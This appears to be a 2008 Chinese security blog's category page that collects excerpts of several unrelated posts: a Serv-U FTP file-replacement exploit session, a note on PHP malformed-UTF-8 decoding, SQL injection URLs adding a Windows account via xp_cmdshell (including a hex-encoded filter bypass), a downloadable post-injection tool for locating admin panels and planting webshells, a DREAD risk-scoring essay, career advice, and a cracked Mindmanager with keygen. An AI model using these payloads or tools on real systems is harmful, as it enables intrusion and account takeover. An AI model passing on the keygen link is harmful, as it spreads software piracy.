Category: 专题文章

http://tools.ip138.com/

看下源码吧。

[img width=500]http://www.neeao.com/blog/attachments/200810/08_110312_20081008_110253.jpg[/img]http://www.neeao.com/blog/attachments/200810/08_110312_20081008_110253.jpg” onload=”javascript:DrawImage(this);” />

PS:KJ大牛写的文章，昨天跟一朋友聊天的时候提到了ADO的command查询，我竟然把这个东西给忘记了，看来记性真的是太差了，找到了kj大牛的文章，拜读一下。

一般写ASP PHP代码的朋友都估计是采用直接操作SQL的吧~

看以下的代码

http://blog.csdn.net/kj021320/archive/2007/08/24/1756858.aspx

[最后修改由 , 于 2008-09-27 09:53:48]

#Serv-U 7.2.0.1 ftp file replacement

#user must have upload permissions

#

#(x) dmnt 2008-10-01

220 Serv-U FTP Server v7.2 ready…

user test

331 User name okay, need password.

pass test

230 User logged in, proceed.

rnfr any_exist_file.ext

350 File or directory exists, ready for destination name.

rnto ..\..\..\boot.ini

250 RNTO command successful.

#boot.ini …

漏洞说明： php是一款被广泛使用的编程语言，可以被嵌套在html里用做web程序开发。但是在php里使用的某些编码函数在处理畸形的utf8序列时会产生不正确的结果，这样在某些情况下可能会引起应用程序的安全漏洞，绕过某些逻辑过滤等等。

漏洞成因：php在处理utf8编码时，对畸形的序列处理不当，如

…

0xc0a7

0xe0c0a7

0xf0c0c0a7

…

均会被错误地解码为一个0×27，这样就导致安全漏洞的产生。譬如utf8_decode函数的源代码如下：

PHPAPI char *xml_utf8_decode(const XML_Char *s, int len, int *newlen, const XML_Char *encoding)

{

int pos = len;

char *newbuf = emalloc(len 1);

unsigned short c;

char (*decoder)(unsigned short) = NULL;

xml_encoding *enc = xml_get_encoding(encoding);

*newlen = 0;

if (enc) {

decoder = enc->decoding_function;

}

if (decoder == NULL) …

PS：PPT上写的的东西不严谨，找了点资料看下，呵呵，多谢茄子宝提醒。

来源：网络。

我想不少人都看过一些关于SQL Injection针对SQL Server攻击的文章，都是因为变量过滤不足甚至没有过滤而构造畸形SQL语句注入的，包括我写的那篇《SQL Injection的实现与应用》也是这样的例子，因为没有碰到任何的过滤，所以使我们相当轻松就注入成功了，如下：

http://www.ilikeplmm.com/show.asp?id=1;exec master.dbo.xp_cmdshell ‘net user angel pass /add’;–

　　这往往给大家造成误解，认为只要变量过滤了’就可以防止SQL Injection攻击，这种意识为大量程序可以注入埋下祸根，其实仅仅过滤’是不够的，在’被过滤的情况下我们照样玩，看下面语句：

http://www.ilikeplmm.com/show.asp?id=1;declare @a sysname select @a=0×6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400 exec master.dbo.xp_cmdshell @a;–

　　是不是跟上面的那句有很大区别？可是效果完全是一样的。其实这些都是SQL语句。

0×6e006500740020007500730065007200200061006e00670065006c002000700061007300730020002f00610064006400

　　这句是“net user angel pass /add”的16进制格式。了解SQL的朋友就轻易明白，先声明一个变量a，然后把我们的指令赋值给a，然后调用变量a最终执行我们输入的命令。变量a可以是任何命令。如下：

declare @a sysname

select @a=

exec master.dbo.xp_cmdshell @a

解决办法：

　　过滤变量，限制只答应输入特定字符。比如对于数字类型的变量就限制只能输入数字类型的数据。具体就不说了。这完全是程序作者自由发挥了。

[最后修改由 , 于 2008-09-23 …

[img width=500]http://www.neeao.com/blog/attachments/200809/27_175605_phpcms20071.jpg[/img]http://www.neeao.com/blog/attachments/200809/27_175605_phpcms20071.jpg” onload=”javascript:DrawImage(this);” />

[img width=500]http://www.neeao.com/blog/attachments/200809/27_175609_phpcms20072.jpg[/img]http://www.neeao.com/blog/attachments/200809/27_175609_phpcms20072.jpg” onload=”javascript:DrawImage(this);” />

简单写了个工具。方便大家使用。主要是在存在注入的时候使用

得到密码却找不到后台。可以帮你找到后台

得到MD5破不出密码。可以帮你找到路径。读取数据库配置文件。或许这个明文密码就是后台密码。也可以用来社工进一步渗透。

或者可以备份shell 到爆出来的路径。

呵呵。喜欢就顶起。。。。。

[img width=500]styles/default/images/icon_file.gif” border=”0″ /> 点击下载

from:http://www.t00ls.net/viewthread.php?tid=50&pid=260&page=1&extra=#pid260

(by axis, 转载请注明出处)

漏洞是安全的主要话题，但不是全部。

在很多时候会出现一种困扰，就是某个漏洞到底是否重要，往往是公说公有理，婆说婆有理。

程序员一般会和安全人员在这个问题上扯皮，比如一个XSS，程序员很可能就认为这个问题不重要，或者优先级不是非凡高，而安全人员往往会绞尽脑汁的去提高漏洞的重要程度，可能会伴随有一系列的POC演示去恐吓程序员。但是在很多时候，往往漏洞是没有POC的，这时候该怎么办？

更多的时候，安全人员需要去说服或者教育老板什么是安全的，以帮助其做决策。而老板都是很精明的主，假如拿不出很充分的数据或者证据来说明漏洞或者威胁为什么重要，他往往会降低安全方案的优先级别（商业公司环境下）。

所以风险评估过程中，非常重要的一步就是如何给风险评级，量化风险。

实际上，目前已知的所有描述方法都是希望用定量的方法去描述一个定性的问题，所以我认为，这些方法都只能参考，并没有一个权威的标准。

比较简单，有这样的公式：

Risk = Probability * Damage

把风险描述为可能性与造成损失的积。 这个描述还是有一定的依据的。

其实并非每个漏洞都需要补，比如某个溢出漏洞，在当前环境下利用极其困难或者说基本上没法利用，那么这个漏洞就可以说是风险等级较低，因为 Probability的分数会很低。

再具体点，比如MS08-001，是windows上的tcpip.sys 里的一个漏洞，涉及到TCP/IP协议栈，连端口都不需要就可以攻击，看起来威力强大，但是这个漏洞由于随机性太强，也导致基本无法利用，顶多DOS一下。

所以我们需要一种更加科学的方法来描述风险。

在我公司的SDL里，我通常喜欢用 DREAD 模型(取首字母)来描述风险：

[img width=500]http://www.neeao.com/blog/attachments/200809/09_181754_123213.jpg[/img]http://www.neeao.com/blog/attachments/200809/09_181754_123213.jpg” onload=”javascript:DrawImage(this);” />

这个模型的5项分别是： 潜在危害、重复利用的可能性、利用的困难程度、受影响用户范围、发现的难易程度。

这个模型从5个方面来描述，视角比较全面，对于每一项都有3个等级，对应着权重，从而形成了一个矩阵。

在量化风险的过程中，可以对每个威胁进行评分：

Risk = D R E A D

最后得出来，假如是 5-7 分，则是低风险； 8-11分，则是中等风险；12-15分，则是高风险。

假如说要扩展这个模型，我觉得可以多加一项权重，0分，然后计算方法把求和变成求积，这要更能拉开分数差距，而且还把0分的极端情况考虑进来了。

0分的极端情况是什么情况？就是一个漏洞变成一个bug的情况。比如这个漏洞是很牛B，被人利用了就会导致直接root机器，但是就是没人能够接触到这个input的位置，所以没人能够利用这个漏洞，这样affected users这项就会是0分，最后一求积，整体风险 0 分， 漏洞不需要修补，因为没人能利用。

当然这个例子有点极端，0分的情况一定要慎用，在上例中，以后代码可能会出现些变动，导致原来无法控制input的地方变得可以控制了，就会导致一个0分的风险，马上变成最高的风险。这又从一个侧面证实：安全是一个持续的过程！

其他类似的评估风险的方法还有很多，比如再加一个修正因子之类。

风险评估结束后，就可以依据风险的等级，判定优先级，从而给决策和架构设计提供有力的科学依据，就不再是纯粹凭借经验来做事，不再山寨了！

ps;不知道有什么新功能没，下来看看先，^_^。

Mindmanager7.1.394中文版下载：

务必先得安装Microsoft .NET Framework 2.0

[url=http://www.mediafire.com/file/z7dtfehn1er/Mindmanager 7.1.394.rar]

点击下载Mindmanager7.1.394中文版（内含注册机）[/url]

【1】好好规划自己的路，不要跟着感觉走！根据个人的理想决策安排，绝大部分人并不指望成为什么院士或教授，而是希望活得滋润一些，爽一些。那么，就需要慎重安排自己的轨迹。从哪个行业入手，逐渐对该行业深入了解，不要频繁跳槽，非凡是不要为了一点工资而转移阵地，从长远看，这点钱根本不算什么，当你对一个行业有那么几年的体会，以后钱根本不是问题。频繁地动荡不是上策，最后你对哪个行业都没有摸透，永远是新手！

【2】可以做技术，切不可沉湎于技术。千万不可一门心思钻研技术！给自己很大压力，假如你的心思全部放在这上面，那么注定你将成为孔乙己一类的人物！适可而止为之，因为技术只不过是你今后前途的支柱之一，而且还不是最大的支柱，除非你只愿意到老还是个工程师！

【3】不要去做技术高手，只去做综合素质高手！在企业里混，我们时常瞧不起某人，说他“什么都不懂，凭啥拿那么多钱，凭啥升官！”这是普遍的典型的工程师的迂腐之言。8051很牛吗？人家能上去必然有他的本事，而且是你没有的本事。你想想，老板搞经营那么多年，难道见识不如你这个新兵？人家或许善于治理，善于领会老板意图，善于部门协调等等。因此务必培养自己多方面的能力，包括治理，亲和力，察言观色能力，攻关能力等，要成为综合素质的高手，则前途无量，否则只能躲在角落看示波器！技术以外的技能才是更重要的本事！！从古到今，美国日本，一律如此！

【4】多交社会三教九流的朋友！不要只和工程师交往，认为有共同语言，其实更重要的是和其他类人物交往，假如你希望有朝一日当老板或高层治理，那么你整日面对的就是这些人。了解他们的经历，思维习惯，爱好，学习他们处理问题的模式，了解社会各个角落的现象和问题，这是以后发展的巨大的本钱，没有这些以后就会笨手笨脚，跌跌撞撞，碰到重重困难，交不少学费，成功的概率大大降低！

【5】知识涉猎不一定专，但一定要广！多看看其他方面的书，金融，财会，进出口，税务，法律等等，为以后做一些积累，以后的用处会更大！会少交许多学费！！

【6】抓住时机向技术治理或市场销售方面的转变！要想有前途就不能一直搞开发，适当时候要转变为治理或销售，前途会更大，以前搞技术也没有白搞，以后还用得着。搞治理可以培养自己的领导能力，搞销售可以培养自己的市场概念和思维，同时为自己以后发展积累庞大的人脉！应该说这才是前途的真正支柱。。?

【7】逐渐克服自己的心里弱点和性格缺陷！多疑，敏感，天真（贬义，并不可爱），犹豫不决，胆怯，多虑，脸皮太薄，心不够黑，教条式思维。。。这些工程师普遍存在的性格弱点必须改变！很难吗？只在床上想一想当然不可能，去帮朋友守一个月地摊，包准有效果，去实践，而不要只想！不克服这些缺点，一切不可能，甚至连项目经理都当不好–尽管你可能技术不错！

【8】工作的同时要为以后做预备！建立自己的工作环境！及早为自己配置一个工作环境，装备电脑，示波器（可以买个二手的），仿真器，编程器等，业余可以接点活，一方面接触市场，培养市场感觉，同时也积累资金，更重要的是预备自己的产品，咱搞技术的没有钱，只有技术，技术的代表不是学历和证书，而是产品，拿出象样的产品，就可技术转让或与人合作搞企业！先把东西预备好，等待机会，否则，有了机会也抓不住！

【9】要学会善于推销自己！不仅要能干，还要能说，能写，善于利用一切机会推销自己，树立自己的品牌形象，很必要！要创造条件让别人了解自己，不然老板怎么知道你能干？外面的投资人怎么相信你？提早把自己推销出去，机会自然会来找你！搞个个人主页是个好注重！！非凡是培养自己在行业的名气，有了名气，高薪机会自不在话下，更重要的是有合作的机会…

打开迅雷看看，我的NOD32就报警了，狂汗。

[img width=500]http://www.neeao.com/blog/attachments/200809/28_191248_123.jpg[/img]http://www.neeao.com/blog/attachments/200809/28_191248_123.jpg” onload=”javascript:DrawImage(this);” />